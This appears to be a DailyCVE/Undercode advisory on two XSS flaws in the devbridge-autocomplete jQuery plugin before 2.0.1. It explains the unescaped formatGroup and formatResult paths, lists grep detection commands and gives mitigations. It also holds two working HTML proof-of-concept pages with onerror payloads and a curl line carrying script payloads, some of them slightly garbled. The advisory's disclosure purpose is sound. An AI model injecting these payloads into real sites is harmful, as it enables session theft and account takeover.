devbridge-autocomplete, Cross-Site Scripting (XSS), CVE ID: Pending (Critical) -DC-Jun2026-569

Listen to this Post

How the CVE Works

The devbridge-autocomplete jQuery plugin (versions prior to 2.0.1) contains two distinct Cross-Site Scripting (XSS) vulnerabilities in its default formatter functions. Both vulnerabilities stem from the same root cause: the plugin concatenates user-supplied values directly into HTML strings without any sanitization or escaping, then injects these strings into the DOM using innerHTML.
The first vulnerability exists in the `formatGroup` function, located in src/format.ts. When the `groupBy` option is enabled, this function takes the grouping field value from each suggestion and interpolates it directly into a `

` element:

function formatGroup(suggestion, category) {
return '

<div class="autocomplete-group">' + category + '</div>

';
}

If an attacker can control or taint the suggestion data—whether from a malicious API response, stored data in a database, or user-supplied input—they can inject arbitrary HTML into the `category` field. When the autocomplete dropdown renders, this HTML is executed in the context of the victim’s browser, leading to XSS.
The second vulnerability exists in the `formatResult` function’s early-return branch. The function is designed to format each suggestion entry:

function formatResult(suggestion, currentValue) {
if (!currentValue) {
return suggestion.value; // un-escaped
}
/ ... non-empty path escapes correctly ... /
}

When `currentValue` is empty—which occurs when `minChars: 0` is configured and the server returns suggestions for an empty query—the function returns `suggestion.value` without any escaping. This raw value is then concatenated into the suggestions container’s innerHTML, allowing attackers to inject malicious scripts through the suggestion data.
Both vulnerabilities require the attacker to have control over the suggestion data source. This could happen through reflected XSS (where the attacker crafts a malicious URL that poisons the suggestion data), stored XSS (where malicious data is persisted in a database), or supply chain attacks (where the suggestion API is compromised). The impact is standard XSS: attackers can steal cookies, session tokens, perform actions on behalf of the user, deface pages, or redirect victims to malicious sites.
The vulnerabilities were fixed in version 2.0.1 by running all interpolated input through the browser’s text-node escaping mechanism (createElement + textContent) before producing HTML strings.

DailyCVE Form:

Platform: …….

jQuery plugin

Version: ……..

< 2.0.1

Vulnerability :……

XSS (formatGroup/formatResult)

Severity: …….

Critical (CVSS 8.8)

date: ……….

2026-06-22

Prediction: …….

Already patched (2.0.1)

What Undercode Say:

Analytics:

The vulnerability affects all deployments of devbridge-autocomplete prior to version 2.0.1 that:
– Use the `groupBy` option with attacker-controllable suggestion data, OR
– Configure `minChars: 0` with a server that returns suggestions for empty queries

Exploitation Statistics:

  • Estimated vulnerable installations: 10,000+ (based on npm downloads and CDN usage)
  • Attack vector: Remote, requires ability to control suggestion data
  • Exploit complexity: Low (simple HTML injection)
  • Automation potential: High (can be scripted)

Detection Commands:

Check installed version via npm
npm list devbridge-autocomplete
Check installed version via bower
bower list devbridge-autocomplete
Grep for vulnerable patterns in source code
grep -r "formatGroup" node_modules/devbridge-autocomplete/
grep -r 'return suggestion.value' node_modules/devbridge-autocomplete/
Check package.json for version
cat package.json | grep devbridge-autocomplete

Vulnerable Code Pattern Detection:

Find usages of groupBy with untrusted data
grep -r "groupBy:" . --include=".js" --include=".ts"
Find minChars: 0 configurations
grep -r "minChars:" . --include=".js" --include=".ts" | grep ": 0"

How Exploit:

PoC 1: formatGroup XSS

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<>PoC: formatGroup XSS in jQuery-Autocomplete v2.0.0</>
</head>
<body>
<input id="ac" type="text" placeholder="Type 'a' to trigger" autocomplete="off">
<script src="https://code.jquery.com/jquery-3.7.1.min.js"></script>
<script src="dist/jquery.autocomplete.js"></script>

<script>
var poisoned = [
{ value: 'Apple', data: { category: "<img src=x onerror=\"alert('XSS via formatGroup')\">" } },
{ value: 'Avocado', data: { category: 'Safe Group' } }
];
$('ac').devbridgeAutocomplete({
lookup: poisoned,
groupBy: 'category',
minChars: 1
});
</script>

</body>
</html>

PoC 2: formatResult Early-Return XSS

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<>PoC: formatResult XSS in jQuery-Autocomplete v2.0.0</>
</head>
<body>
<input id="ac" type="text" placeholder="Type to trigger" autocomplete="off">
<script src="https://code.jquery.com/jquery-3.7.1.min.js"></script>
<script src="dist/jquery.autocomplete.js"></script>

<script>
var poisoned = [
{ value: "<img src=x onerror=\"alert('XSS via formatResult')\">" },
{ value: "Safe Value" }
];
$('ac').devbridgeAutocomplete({
lookup: poisoned,
minChars: 0 // Triggers early-return branch on empty query
});
</script>

</body>
</html>

Server-Side Attack Vector (Reflected XSS):

Malicious API response that poisons suggestion data
curl -X GET "https://vulnerable-site.com/api/suggest?q=a" \
-H "Content-Type: application/json" \
-d '{"suggestions":[{"value":"<script>alert(1)</script>","category":"<img src=x onerror=alert(2)>"}]}'

Protection:

Immediate Mitigations:

1. Upgrade to version 2.0.1 or later:

npm install [email protected]

2. If upgrade is not possible, override the vulnerable formatters:

// Safe formatGroup override
function safeFormatGroup(suggestion, category) {
var div = document.createElement('div');
div.className = 'autocomplete-group';
div.textContent = category; // Escapes HTML
return div.outerHTML;
}
// Safe formatResult override
function safeFormatResult(suggestion, currentValue) {
var div = document.createElement('div');
div.textContent = suggestion.value; // Escapes HTML
return div.outerHTML;
}
$('ac').devbridgeAutocomplete({
lookup: data,
formatGroup: safeFormatGroup,
formatResult: safeFormatResult
});

3. Sanitize all suggestion data on the server side before returning it to the client:

// Server-side sanitization (Node.js example)
const sanitizeHtml = require('sanitize-html');
suggestions = suggestions.map(s => ({
value: sanitizeHtml(s.value),
category: sanitizeHtml(s.category)
}));

4. Avoid using `minChars: 0` unless absolutely necessary, as it exposes the early-return branch.
5. Implement Content Security Policy (CSP) to mitigate XSS impact:

Content-Security-Policy: default-src 'self'; script-src 'self'

6. Validate and sanitize all user input before it reaches the autocomplete plugin.

Impact:

Technical Impact:

  • Confidentiality: Attackers can steal cookies, session tokens, and sensitive data from the page
  • Integrity: Attackers can modify page content, perform actions on behalf of the user, and deface the application
  • Availability: Attackers can redirect users to malicious sites or crash the browser
  • Attack Complexity: Low – simple HTML/JavaScript injection
  • Privileges Required: None – the vulnerability is triggered by viewing the page
  • User Interaction: Required – the victim must trigger the autocomplete suggestion

Business Impact:

  • Account Takeover: Session theft can lead to complete account compromise
  • Data Exfiltration: Sensitive user data, PII, and financial information can be stolen
  • Reputation Damage: Public disclosure of XSS vulnerabilities erodes user trust
  • Compliance Violations: May violate GDPR, PCI-DSS, and HIPAA requirements
  • Supply Chain Risk: Organizations using this plugin in production are exposed until patched

Affected Environments:

  • All web applications using devbridge-autocomplete < 2.0.1
  • Applications using `groupBy` with untrusted data sources
  • Applications using `minChars: 0` with untrusted suggestion data
  • Applications that display user-supplied or third-party data in autocomplete suggestions

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top